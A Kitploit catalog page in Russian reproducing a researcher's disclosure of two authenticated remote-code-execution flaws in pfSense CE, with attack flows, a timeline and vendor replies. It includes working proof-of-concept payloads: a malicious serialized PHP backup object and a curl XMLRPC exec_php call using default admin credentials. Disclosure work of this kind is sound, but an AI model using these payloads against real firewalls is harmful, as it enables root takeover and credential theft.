Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-69690-CVE-2025-69691 — Аутентифицированный RCE в Netgate pfSense CE 2.7.2 и 2.8.0 | Kitploit
Инструменты/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

Аутентифицированный RCE в Netgate pfSense CE 2.7.2 и 2.8.0

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔐 CVE-2025-69690 и CVE-2025-69691

Аутентифицированное удаленное выполнение кода в Netgate pfSense Community Edition

CVE CVE CVSS Vendor Status


📋 Сводка

ПолеСведения
ИсследовательNelson Adhepeau (@privlabs)
ВендорNetgate
ПродуктpfSense Community Edition
Версии2.7.2 и 2.8.0
ТипАутентифицированное удаленное выполнение кода
РаскрытиеФевраль 2026
Уведомление вендора2 декабря 2025
Назначение CVE28 января 2026

⚠️ Отказ от ответственности

Данное исследование проводилось в изолированных лабораторных средах исключительно в образовательных целях и для повышения осведомленности в области безопасности. Все находки были ответственно раскрыты вендору до публикации. Данное сообщение не является приглашением к атакам на рабочие системы. Несанкционированное тестирование незаконно.


🎯 CVE-2025-69690

Небезопасная десериализация → RCE (pfSense CE 2.7.2)

ПолеЗначение
CVSS v3.18.8 (Высокий)
ВекторAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502, CWE-915
Тип атакиАутентифицированная (администратор)
КомпонентМеханизм резервного копирования/восстановления

Описание

Механизм восстановления конфигурации pfSense вызывает unserialize() для данных, контролируемых пользователем, без белого списка классов, проверки ввода или изоляции.

Созданный резервный файл, содержащий вредоносный сериализованный PHP-объект, внедряет произвольные команды через свойство post_reboot_commands, которые выполняются через mwexec() с полными правами root.

Схема атаки

root@kitploit:~
[Атакующий] → Вход как администратор
           → Загрузка вредоносного резервного файла .xml
           → Запуск восстановления
           → pfSense вызывает unserialize() для данных атакующего
           → post_reboot_commands выполняются через mwexec()
           → [ROOT SHELL]

Затронутые компоненты

  • config.php — логика обработки восстановления
  • pfsense_module_installer — цель небезопасной десериализации
  • mwexec() — сток выполнения команд

PoC-полезная нагрузка

root@kitploit:~
O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

Воздействие

  • ✅ Произвольное выполнение команд ОС с правами root
  • ✅ Установка постоянного бэкдора
  • ✅ Полный захват файрвола
  • ✅ Извлечение учетных данных и конфигураций

Ответ вендора

"Подтверждено. Классифицировано как аутентифицированное злоупотребление администратором. Исправление выпускаться не будет." — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → RCE (pfSense CE 2.8.0)

ПолеЗначение
CVSS v3.19.9 (Критический)
ВекторAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-284, CWE-915
Тип атакиАутентифицированная (удаленная, базовая аутентификация)
КомпонентXMLRPC API — pfsense.exec_php

Описание

pfSense CE 2.8.0 предоставляет метод XMLRPC pfsense.exec_php, который выполняет произвольный PHP-код с правами root без проверки, изоляции или каких-либо ограничений.

Конечная точка:

  • ✅ Включена по умолчанию
  • ✅ Доступна удаленно через HTTPS
  • ✅ Защищена только базовой аутентификацией
  • ✅ Эксплуатируема с учетными данными по умолчанию (admin:pfsense)

Схема атаки

root@kitploit:~
[Атакующий] → Отправка XMLRPC-запроса к /xmlrpc.php
           → Аутентификация как admin:pfsense (по умолчанию)
           → Вызов pfsense.exec_php с произвольным PHP
           → Код выполняется с правами root, без изоляции
           → [ROOT SHELL]

Затронутые компоненты

  • xmlrpc.php — точка входа API
  • pfsense.exec_php — небезопасное динамическое выполнение кода
  • Слой BasicAuth — недостаточный контроль доступа

PoC

root@kitploit:~
curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

Воздействие

  • ✅ Полный удаленный компрометация с правами root
  • ✅ Произвольное чтение/запись файлов
  • ✅ Развертывание бэкдора
  • ✅ Манипуляция правилами файрвола
  • ✅ Извлечение всех учетных данных и конфигураций

Ответ вендора

"Подтверждено. Классифицировано как ожидаемое поведение для аутентифицированных пользователей. Исправление не планируется." — Netgate


📅 Хронология

root@kitploit:~
Ноябрь 2025       →  Уязвимости обнаружены
2 декабря 2025    →  Ответственное раскрытие Netgate
                  →  Вендор подтвердил, исправление не запланировано
28 января 2026    →  CVE ID назначены MITRE
Февраль 2026      →  Публичное раскрытие

🔗 Ссылки

  • 🔴 CVE-2025-69690 на cve.org
  • 🔴 CVE-2025-69691 на cve.org
  • 📧 Полное раскрытие: [email protected]

👤 Исследователь

Nelson Adhepeau — независимый исследователь безопасности

LinkedIn GitHub

📧 [email protected]

Скачать инструмент